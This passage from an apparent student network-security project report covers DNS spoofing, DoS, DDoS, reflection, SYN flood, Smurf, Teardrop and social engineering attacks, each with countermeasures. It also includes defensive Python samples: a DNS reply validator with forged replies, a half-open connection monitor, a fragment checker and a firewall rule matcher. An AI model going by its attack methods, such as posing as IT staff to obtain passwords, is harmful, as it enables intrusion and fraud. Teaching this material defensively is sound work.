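        (cacheable if in_bailiwick(rr[0], pending["zone"]) else dropped).append(rr)
    return True, cacheable, f"accepted; {len(dropped)} out-of-bailiwick record(s) discarded"

# Constructed replies: records are (name, type, value)
GENUINE = {"txid": 0x1A2B, "src": ("192.0.2.53", 53), "qname": "www.example.com", "qtype": "A",
           "answers": [("www.example.com", "A", "192.0.2.10")],
           "additional": [("ns1.example.com", "A", "192.0.2.53")]}
# Forged reply whose transaction ID was guessed wrongly
WRONG_TXID = dict(GENUINE, txid=0x0001, answers=[("www.example.com", "A", "198.51.100.66")])
# Forged reply with the right ID but sent from a host other than the queried server
WRONG_SRC = dict(GENUINE, src=("198.51.100.7", 53))
# Otherwise valid reply that tries to plant a record for an unrelated bank domain
POISON_ADDITIONAL = dict(GENUINE, additional=[("www.bank.example", "A", "198.51.100.66")])

def run_samples() -> dict:
    return {name: validate_reply(PENDING, r)[:2] for name, r in
            [("genuine", GENUINE), ("wrong_txid", WRONG_TXID),
             ("wrong_src", WRONG_SRC), ("poison_additional", POISON_ADDITIONAL)]}
```

The source check is the one the report says name servers historically did not do. Real resolvers also randomize the transaction ID and the UDP source port of each query (RFC 5452), so a forged reply has to guess both before the genuine one arrives.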
6. Password cracking
Sometimes, in the case of a partial break-in, a company's encrypted password file might
be exposed to a hacker (or rather a cracker, in that case). If that happens, the attacker will start
cracking the file, i.e. trying all possible combinations in order to
find the weakest passwords and gain privileges later on. [17]
Countermeasure: If the company is aware that its password file has been
compromised, it should immediately notify all employees to change their passwords, so that
even if weak passwords are exposed, they are no longer valid. However, since
the company may not be aware that its password file has been exposed, it should constantly try to crack
its own password file just as an attacker would, and weed out the weakest passwords.
2.7.3 DoS
A DoS (Denial of Service) attack is an attempt to prevent legitimate users of a service or
network resource from accessing that service or resource. DoS attacks are not targeted at
stealing, modifying or deleting information. A DoS attack comes in many forms, like
cutting off the power to a system or flooding a system with seemingly legitimate network
traffic: anything that results in a denial of service. DoS attacks usually make use of
software bugs to crash or freeze a service or network resource, or of bandwidth limits, by
using a flood attack to saturate all available bandwidth.
Different methods of DoS:
• DoS
A DoS attack in the narrow sense is when the attacker launches the attack from his or her own computer; this
is done by sending packets of data to the remote computer, and for each packet sent the
target machine receives one. This is a very uncommon form of denial of service
because the attack is most of the time very unsuccessful and at times can be easily
traced. Such DoS attacks are usually carried out by amateur script kiddies.


Figure 2.6: DoS


• DDoS
A distributed denial of service attack is when an attacker attacks from multiple source
systems. A DDoS attack is generally more effective than a DoS attack at bringing down
large corporate sites. The attacker can arrange for a large number of computers to
connect to a website at the same time. The web server has a maximum allowed
number of client connections; once this number is reached, the server denies further
connections, so there is a denial of service. Usually the attacker does not own all
these computers, so he uses Trojan horses with back doors as malicious code to infect
computers, which become zombies (also called “secondary victims”). The users of the
infected computers are not aware that their computers are used in a DDoS attack. DoS
bots (short for robots: the flooding programs present on the secondary victims'
computers) usually implement standard flooding techniques such as ICMP, UDP, TCP and SYN
flooding. The Internet services and resources under attack are the “primary victims”.
A typical DDoS attack consists of a master, slaves and a victim: the master is the
attacker, the slaves are the compromised systems and the victim is the attacker's target.

Figure 2.7: DDoS Attack



• DRDoS
DRDoS is when an attacker sets his bots to flood different intermediate hosts with
spoofed packets. For example, the attacker sets half his bots to flood yahoo.com with
spoofed ICMP packets and the other half to flood ebay.com with spoofed ICMP packets. The spoofed
packets appear to have microsoft.com as their source, so yahoo.com and ebay.com flood
microsoft.com (ebay.com and yahoo.com reply to the spoofed source). Moreover, for each
packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may
have thousands of machines behind the same IP address, and each of these machines will
reply to the spoofed ICMP packet, therefore amplifying the power of the attack
greatly.


Figure 2.8: DRDoS. Red lines: connections from the attacker's computer to the zombie computers. Blue
lines: zombies sending spoofed ICMP packets; the ICMP packets look like they come from the
Internet core router the attacker wants to attack. Green lines: each of the computers connected to
ebay.com, yahoo.com, cnn.com and Amazon.com replies to the spoofed ICMP packets, therefore
flooding the Internet core router.




Figure 2.9 DRDoS- Malicious SYN packets are being "Reflected" off innocent TCP servers. Their
SYN/ACK responses are being used to flood and attack the target network.


There are also different types of DoS attacks:
• TCP SYN Flood Attack
A TCP session is established by using a three-way handshake mechanism, which
allows the client and the host to synchronize the connection and agree upon the initial
sequence numbers. When the client connects to the host, it sends a SYN request to
establish and synchronize the connection. The host replies with a SYN/ACK, again
to synchronize. Then the client acknowledges that it received the SYN/ACK packet by
sending an ACK. When the host receives the ACK the connection becomes
OPEN, allowing traffic from both sides (full-duplex). The connection remains open
until the client or the host issues a FIN or RST packet, or the connection times out. If
you flood a remote computer with SYN packets, it is going to send back a SYN/ACK
packet for each of them, so bandwidth is wasted. In addition, in a TCP SYN flood attack the
connection is never completed, so the target computer is left waiting for an ACK;
therefore it is possible to max out the remote computer's connection queue.
Connections from legitimate users will be rejected in this case. The amount of
bandwidth this attack uses is very minimal, although if done on a very large scale it
could affect the bandwidth of a web server.

Figure 2.10: TCP 3 way handshake



Countermeasure: Many routers and other network nodes today are able to detect SYN
floods by monitoring the number of unacknowledged (half-open) TCP sessions and dropping them
before the session queue is full. They can often be configured to set the maximum
allowed number of half-open connections, and to limit the amount of time the host waits
for the final acknowledgement. Without these preventive measures, the server could
eventually run out of memory, causing it to crash entirely.
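The monitoring side of this countermeasure on a host, as an added example that is not part of the original report: the connection table is read in the column layout of `netstat -ant`, half-open (SYN_RECV) entries are counted per remote source and per local port, and an alert is raised when a single source or the total exceeds a limit. The sample table, the limits and the function name are constructed for the illustration; the limits are not defaults of any product.

```python
from collections import Counter

# Constructed sample in the column layout of `netstat -ant` (proto, recv-q, send-q,
# local address, foreign address, state); not captured from a real host.
# 40 half-open connections from one source simulate a SYN flood against port 80.
_FLOOD = "\n".join(f"tcp 0 0 10.0.0.5:80 203.0.113.7:{51200 + i} SYN_RECV" for i in range(40))
SAMPLE = _FLOOD + """
tcp 0 0 10.0.0.5:80 198.51.100.9:44210 SYN_RECV
tcp 0 0 10.0.0.5:80 198.51.100.9:44211 ESTABLISHED
tcp 0 0 10.0.0.5:22 192.0.2.44:5555 ESTABLISHED
"""

def half_open_report(text: str, per_source_limit: int = 20, total_limit: int = 50) -> dict:
    """Count SYN_RECV entries per remote source and per local port, and flag the
    thresholds the countermeasure describes (example limits, chosen for the sample)."""
    by_source, by_port = Counter(), Counter()
    total = established = 0
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] != "tcp":
            continue                      # header, blank line or non-TCP entry
        local, foreign, state = parts[3], parts[4], parts[5]
        if state == "SYN_RECV":
            total += 1
            by_source[foreign.rsplit(":", 1)[0]] += 1   # strip the remote port
            by_port[local.rsplit(":", 1)[1]] += 1       # keep only the local port
        elif state == "ESTABLISHED":
            established += 1
    suspects = sorted(src for src, n in by_source.items() if n > per_source_limit)
    return {
        "half_open": total,
        "established": established,
        "by_local_port": dict(by_port),
        "suspect_sources": suspects,
        "alert": total > total_limit or bool(suspects),
    }
```

When the attacker spoofs a different source address on every SYN, the per-source count stays low and only the total rises; that is why the total and the time a host is allowed to wait for the final ACK are the limits that matter most in practice.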
• UDP Flood Attack
UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP
port(s) on the remote computer. Since UDP is a connectionless protocol (no
handshake mechanism), UDP flooding can be very effective and easy to abuse for
flood attacks. A common type of UDP flood attack, often referred to as a Pepsi attack,
is an attack in which the attacker sends a large number of forged UDP packets to
random diagnostic ports on a target host. The CPU time, memory, and bandwidth
required to process these packets may cause the target to become unavailable for
legitimate users.
Countermeasure: To minimize the risk of a UDP flood attack, disable all unused
UDP services on hosts and block the unused UDP ports if you use a firewall to
protect your network.
• Ping of Death Attack
An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that
were made before 1996 (Windows 95, NT4).
Countermeasure: Modern operating systems and network devices safely disregard
these oversized packets. Older systems can usually be updated with a patch.
• Smurf Attack
An attack where a ping request is sent to a broadcast network address with the
sending address spoofed so many ping replies will come back to the victim and
overload the ability of the victim to process the replies. This attack is made possible
mostly because of badly configured network devices that respond to ICMP echoes
sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by
a factor equal to the number of hosts behind the router that reply to the ICMP echo
packets.

Figure 2.11: Smurf Attack
Besides the target system, the intermediate router is also a victim, and thus also the
hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP
echo packets is called a Fraggle attack.
Countermeasure: It is difficult to prevent Smurf attacks entirely because they are
made possible by incorrectly configured networks belonging to third parties. The Smurf
Amplifier Registry (SAR), http://www.powertech.no/smurf/, and Netscan.org are two of
several publicly available databases that can be used to configure routers and
firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry
(SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure
all interfaces are configured with the no ip directed-broadcast command (the default
since IOS 12.0).



• Teardrop Attack
A normal fragment is sent, then a second fragment is sent whose fragmentation offset
claims to lie inside the first fragment. This second fragment is too small to even
extend beyond the end of the first fragment. This may cause an unexpected error condition to
occur on the victim host, which can cause a buffer overflow and a possible system crash
on many operating systems. [15]
Countermeasure: Today’s implementations of the TCP/IP stack safely disregard such
invalid packets.
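The validation a reassembly routine performs to "safely disregard" such fragments, as an added example that is not part of the original report, covering both the Teardrop pattern above (a fragment whose offset lands inside an already received one) and the Ping of Death pattern (a reassembled datagram larger than 65,535 bytes). Fragments are modelled as the three header fields that matter (offset in 8-byte units, more-fragments flag, payload length); the fragment sets and the 20-byte header assumed for the size check are constructed for the illustration.

```python
MAX_DATAGRAM = 65535   # largest total length an IPv4 datagram may have
IP_HEADER = 20         # assumed minimal IPv4 header when computing the reassembled size

def check_fragments(frags):
    """frags: list of (offset_in_8_byte_units, more_fragments, payload_len).
    Returns (ok, reason). Rejects a fragment that overlaps one already accepted
    (Teardrop) and a datagram that would exceed 65,535 bytes (Ping of Death)."""
    covered = []   # byte ranges [start, end) of fragments already accepted
    for off, mf, length in sorted(frags, key=lambda f: f[0]):
        start, end = off * 8, off * 8 + length
        if mf and length % 8 != 0:
            return False, f"non-final fragment at offset {off} has length {length}, not a multiple of 8"
        if IP_HEADER + end > MAX_DATAGRAM:
            return False, f"reassembled size {IP_HEADER + end} exceeds {MAX_DATAGRAM} bytes"
        for s, e in covered:
            if start < e and end > s:
                return False, f"fragment [{start},{end}) overlaps accepted fragment [{s},{e})"
        covered.append((start, end))
    return True, "ok"

# Constructed fragment sets: (offset in 8-byte units, MF flag, payload length)
NORMAL   = [(0, 1, 1480), (185, 0, 300)]    # second fragment starts exactly where the first ends
TEARDROP = [(0, 1, 1480), (3, 0, 20)]       # second fragment claims bytes 24..43, inside the first
OVERSIZE = [(0, 1, 1480), (8180, 0, 120)]   # last fragment ends at payload byte 65,560: too large
```

A real stack also has to cope with fragments arriving out of order and with the last fragment arriving first; sorting by offset before checking, as done here, is what makes the overlap test independent of arrival order.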
2.7.4 Social Engineering
Before an attacker attempts to gain access to a secured system, he must first know certain
things about the target system. Although an attacker often uses technology, he may
simply try to ask for the information. If the right person asks, he or she will often get it all
too easily.
Social Engineering is the art of having people do what you want, or give you information on
passwords and almost anything else, without them knowing they are doing so. Social
Engineering applies to every aspect of the Internet and also to the real world.
This can start with a simple chat in a chat room or a phone call to a business that
someone wants to gain access to from the Internet without having to hack in. In a
business social engineering scenario, the hacker starts by doing research on the company,
so he will most likely know every department that the company has. He could then
phone up a department, say he is a member of the IT department and that the
passwords are being changed for routine security reasons, and tell the user to
change his/her password to whatever he wants. He could then simply log on to their
system using the new password, and he’s in.
A social engineering attack usually involves an attacker impersonating a seemingly
harmless person to deceive company personnel to obtain information. Obtaining that
information may be the actual goal itself, or it may be used to aid the attacker in
penetrating a secured system. The information can be a user ID, password, access code
and other type of sensitive information, but can also be information that seems harmless
to share. A company phoned by a student conducting a survey about which operating
systems and software they use may actually be giving valuable information to a malicious
attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a
business, or steal a company secret often use social engineering techniques to reach their
malicious goals.
Social engineering attacks are often more complicated and require careful preparation,
acting and persuasion skills. A social engineer collects bits and pieces of information that
will lead him to his goal, typically using his most valuable tool, the phone. Calling a
company and bluntly asking for the information may alarm the employee on the other end of
the phone and ruin the entire attack before it has really started. So before the attacker can
persuade a victim to simply hand out information, he needs to crawl into the skin of
someone the victim will gladly give the information to, someone who works in the same
company, for example. To do that he needs to know the company’s lingo, department
structure, internal phone numbers, and anything else that will make him an “insider”.
Once the attacker talks the talk, knows whom to impersonate and whom to ask what, it is just
a matter of asking the right questions without raising any suspicion to get everything he
wants.
Social engineers have found a relatively new way to attempt to obtain sensitive
information from naïve people, without having to pay them a visit or call them by phone:
email. The attacker sends malicious e-mail messages that seem legitimate and even have
a valid sender address. The message may contain a link that takes the victim to a website
that looks exactly like a site where he or she frequently buys online products with a credit
card number. Or the message may seem to have been sent by the IT department, and
includes an attachment that is supposedly the latest anti-virus update that must be
installed immediately. In reality, the attachment could be a Trojan horse creating a
backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.
The most important thing in social engineering is building trust. If a hacker builds up
some trust with a user then he is going to find it easier to manipulate him to do what he
wants.
Countermeasure: Many companies have acknowledged the necessity of technology such as
firewalls, intrusion detection systems, and advanced authentication systems to secure
their information. However, this technology does not make them less vulnerable to a
social engineer. It may actually lead to a false sense of security, which may make them an
even easier target. To prevent successful social engineering attacks, security policies must
be implemented and enforced. All employees must be informed and trained to recognize
and appropriately respond to a potential social engineering attack.
One of the most important policies that should be implemented is verification of requests.
Not only should the identity of the requestor be verified, but also the request he or she is
making. A simple method to verify a caller’s identity is to call the person back at the phone
number listed in the company’s phone directory. If someone outside the company asks for
inside information, he or she should be forwarded to a manager or the Information
Security department. When a copier maintenance person enters a building, the
receptionist should verify the appointment and ask for an ID.
The best defense against social engineering attacks by e-mail is using certificates for
encrypting and signing e-mail messages, allowing a recipient to positively identify the
sender.
By following some basic rules and using common sense, most social engineering attacks
can be prevented. It is essential to educate employees about these types of attacks and the
methods of a social engineer, because in any security system people are really the
weakest link.

3. Our Network Design
We now tackle the design part of our FYP, i.e. building our Network.
Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium 3
computers (which we will place in Mr. Khaled Joujou’s lab). We therefore agreed with Mr.
Majari that our network will include one Windows and one UNIX workstation, in
addition to one Windows and one UNIX server.
3.1 Topology
The network topology refers to its shape, or its layout. The topology defines how nodes
are connected to each other and how they communicate [8]. The figure
below illustrates the most common network topologies.

Figure 3.1: Network Topologies [8]


As was described in section 1 of this report, the most common topologies businesses use
are hierarchical star networks. Therefore, we have decided to use this kind of topology
when building our network, since the ultimate goal is to simulate a business firm.

3.2 Securing the Perimeter
The most common way of implementing perimeter security is using firewalls [9]. A
large array of firewalls exists today; each brand (and even each model within a brand) focuses
on better security for a given networked environment. From a hacker’s perspective, there
are numerous targets: routers, switches, hosts, applications, but also the network as a
whole (DoS attacks).
Firewalls are hardware devices (though some software firewalls exist) that filter
information coming into and going out of a secured network. Firewalls generally use the
following methods to do their job [10]:
• Packet filtering - Packets (small chunks of data) are analyzed against a set of
filters. Packets that make it through the filters are sent to the requesting system
and all others are discarded.
• Proxy service - Information from the Internet is retrieved by the firewall and then
sent to the requesting system and vice versa.
• Stateful inspection - A newer method that doesn't examine the contents of each
packet but instead compares certain key parts of the packet to a database of
trusted information. Information traveling from inside the firewall to the outside is
monitored for specific defining characteristics, and then incoming information is
compared to these characteristics. If the comparison yields a reasonable match,
the information is allowed through. Otherwise it is discarded.
Some common firewall filters (for inside-to-outside protection) are [11]:
• IP addresses - For example, if a certain IP address outside the company is reading
too many files from a server, the firewall can block all traffic to or from that IP
address.
• Domain names - A company might block all access to certain domain names, or
allow access only to specific domain names.
• Protocols - A company might set up only one or two machines to handle a
specific protocol and ban that protocol on all other machines. Protocols include:
IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…
• Ports - Any server machine makes its services available to the Internet using
numbered ports, one for each service that is available on the server. For example,
if a server machine is running a Web (HTTP) server and an FTP server, the Web
server would typically be available on port 80, and the FTP server would be
available on port 21. A company might block port 21 access on all machines but
one inside the company.
• Specific words and phrases - This can be anything. The firewall will sniff (search
through) each packet of information for an exact match of the text listed in the
filter and block any packet with the word or phrase.
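How a packet filter applies the IP address, protocol and port filters just listed, as an added example that is not part of the original report: rules are tried in order, the first one whose every specified field agrees with the packet decides, and a packet matching no rule is denied. The rule set mirrors the text (one abusive outside address blocked entirely, port 21 allowed to a single FTP machine and blocked elsewhere, port 80 allowed to the web server); the addresses, rule format and packets are constructed for the illustration.

```python
import ipaddress

# Constructed rule set: first match wins, anything unmatched falls through to deny.
RULES = [
    {"action": "deny",  "src": "203.0.113.50/32"},                              # abusive outside host
    {"action": "allow", "proto": "tcp", "dst": "10.0.0.20/32", "dport": 21},    # the one FTP machine
    {"action": "deny",  "proto": "tcp", "dport": 21},                           # port 21 blocked elsewhere
    {"action": "allow", "proto": "tcp", "dst": "10.0.0.10/32", "dport": 80},    # the web server
]

def matches(rule: dict, pkt: dict) -> bool:
    """A rule matches when every field it specifies agrees with the packet;
    fields the rule leaves out match anything."""
    if "proto" in rule and rule["proto"] != pkt["proto"]:
        return False
    for field in ("src", "dst"):
        if field in rule and ipaddress.ip_address(pkt[field]) not in ipaddress.ip_network(rule[field]):
            return False
    if "dport" in rule and rule["dport"] != pkt.get("dport"):
        return False
    return True

def decide(rules: list, pkt: dict):
    """Return (action, index_of_matching_rule); index None means the implicit default deny."""
    for i, rule in enumerate(rules):
        if matches(rule, pkt):
            return rule["action"], i
    return "deny", None

# Constructed packets (documentation address ranges)
PACKETS = {
    "web_to_server":    {"proto": "tcp", "src": "198.51.100.4", "dst": "10.0.0.10", "dport": 80},
    "ftp_to_allowed":   {"proto": "tcp", "src": "198.51.100.4", "dst": "10.0.0.20", "dport": 21},
    "ftp_to_other":     {"proto": "tcp", "src": "198.51.100.4", "dst": "10.0.0.10", "dport": 21},
    "blocked_host_web": {"proto": "tcp", "src": "203.0.113.50", "dst": "10.0.0.10", "dport": 80},
    "dns_to_server":    {"proto": "udp", "src": "198.51.100.4", "dst": "10.0.0.10", "dport": 53},
}

def run_samples() -> dict:
    return {name: decide(RULES, pkt) for name, pkt in PACKETS.items()}
```

Rule order carries the policy: the deny for the abusive address sits first so that it wins even for traffic the later allow rules would accept, and the default deny at the end is what turns a list of exceptions into "everything not expressly permitted is blocked".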
Firewalls can protect or help protect us (with additional hardware and software) from
(outside-to-inside security):
• Remote login - When someone is able to connect to your computer and control it
in some form. This can range from being able to view or access your files to
actually running programs on your computer.
• Application backdoors - Some programs have special features that allow for
remote access. Others contain bugs that provide a backdoor or hidden access,
which provides some level of control of the program.
• SMTP session hijacking